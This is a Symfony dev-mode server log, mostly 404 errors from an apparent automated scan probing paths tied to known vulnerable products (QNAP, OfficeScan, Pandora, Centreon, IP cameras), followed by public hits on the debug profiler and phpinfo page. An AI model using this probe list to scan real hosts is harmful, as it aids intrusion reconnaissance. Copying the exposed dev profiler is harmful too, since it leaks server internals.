[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /language/en-GB/en-GB.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /language/en-GB/en-GB.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /p/login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /p/login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /portal/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /portal/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/param.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/param.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /info.asp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /info.asp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lms/db"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lms/db\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /c/login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /c/login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login/login.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login/login.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /allversions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /allversions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /versions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /versions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.aspx"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.aspx\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /officescan/console/cgi/cgiChkMasterPwd.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /officescan/console/cgi/cgiChkMasterPwd.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /IPCamDesc.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /IPCamDesc.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /kylin/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /kylin/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1.0/environment"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1.0/environment\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cslu/v1/core/conf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cslu/v1/core/conf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/reports/status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/reports/status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/reports/updates"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/reports/updates\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webportal.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webportal.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /build.gradle"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /build.gradle\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /workplace/home.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /workplace/home.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cgi-bin/authLogin.cgi"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cgi-bin/authLogin.cgi\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /pandora_console/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /pandora_console/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /centreon/api/latest/platform/versions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /centreon/api/latest/platform/versions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v3/meta"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v3/meta\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hx/api/about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hx/api/about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /i18n/component/JS"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /i18n/component/JS\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/v1/version"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/v1/version\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/ui/login.jsp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/ui/login.jsp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Main_Login.asp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Main_Login.asp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-19 09:31:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.hona.mx/","method":"GET"} []
[2025-12-19 09:31:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-19 09:31:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:31:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-19 09:31:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:31:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:31:30] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:31:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"GET"} []
[2025-12-19 09:36:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c0fc3e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c0fc3e","method":"GET"} []
[2025-12-19 09:36:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 09:39:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27124","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27124?panel=request","method":"GET"} []
[2025-12-19 09:39:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-19 09:39:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d0bc2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3d0bc2","method":"GET"} []
[2025-12-19 09:39:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-19 09:40:11] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-19 09:40:11] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-19 09:40:11] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:40:11] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-19 09:40:11] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-19 09:40:11] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-19 09:40:11] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-19 09:43:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-19 09:44:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-19 09:44:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
